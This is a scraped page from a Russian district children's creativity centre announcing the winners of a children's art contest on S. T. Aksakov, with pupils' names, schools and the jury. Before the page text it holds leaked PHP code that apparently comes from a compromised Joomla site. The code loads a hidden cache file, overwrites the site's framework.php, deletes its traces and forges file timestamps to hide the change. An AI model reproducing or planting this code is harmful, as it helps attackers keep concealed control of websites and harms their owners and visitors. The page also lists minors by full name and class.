$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Районный конкурс творческих работ
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы иметь возможность оставлять комментарии и скачивать фотографии из нашей "ФОТОГАЛЕРЕИ".



Спасибо за регистрацию.

План мероприятий

Сентябрь 2017
Пн Вт Ср Чт Пт Сб Вс
28 29 30 31 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 1
Developed by JoomVision.com
Баннер

Районный конкурс творческих работ PDF Печать E-mail

Подведены итоги районного конкурса творческих работ

НА ТЕМУ ТВОРЧЕСТВА С. Т. АКСАКОВА

      В соответствии с планом работы РОО и ДДТ на 2016-2017 уч. год в целях привлечения внимания детей к литературному наследию С. Т. Аксакова, активизации изобразительного искусства учащихся прошел районный конкурс по программе ОООО ФДО «Строим город малышей». В конкурсе приняли участие 8 школ: Новосергиевские школы № 1,4; Кулагинская, Нестеровская, Лапазская, Сузановская, Кутушевская СОШ и Платовская СОШ им. А. Матросова.

Всего на конкурс поступило 29 работ.

На основании протоколов экспертного совета и положения конкурса был вявлен список победителей:

Присудить призовые места и вручить почетные грамоты

 

1 место Гордеева Татьяна 1 «Б» кл НСОШ № 1

1 место Карязин Антон 1 «В» кл НСОШ № 1

1 место Панасюк Сергей 2 кл рук. Коваль С. М. Сузановская СОШ

1 место Муртазин Денис 3 кл Лапазская СОШ Рук. Бородина Г. Б.

1 место Атаков Иван 1 А кл

2 место Биктимиров Ильгиз 1 А кл

2 место Козлов Матвей 2 кл Платовская СОШ им. А. Матросова

2 место Цергинец Маргарита 2 кл Платовская СОШ им. А. Матросова

Рук. Карина Х. Ю.

3 место Чинков Александр 1 кл Кулагинская СОШ Рук. Шипилова З. А.

 

3 место Лупандина Валерия 1 кл Кулагинская СОШ Рук. Шипилова З. А.

3 место Молчанова Анна 1 В кл НСОШ №1

3 место Фролова Дарья 1 кл Платовская СОШ им. А. Матросова рук. Кистанова С. А.

3 место Пешкова Виктория 3 кл Нестеровская СОШ рук. В. П. Бухонина

 

Конкурсная комиссия:

Винокурова Е. Н. –председатель комиссии, педагог ДО ДДТ

Мигачева Н. В. – член комиссии, педагог ДО ДДТ

Плужнова С. А. – член комиссии, педагог ДО ДДТ

Луконина Л. В. – секретарь комиссии, социальный педагог ДДТ

 

Назад

Обновлено 16.11.2016 15:24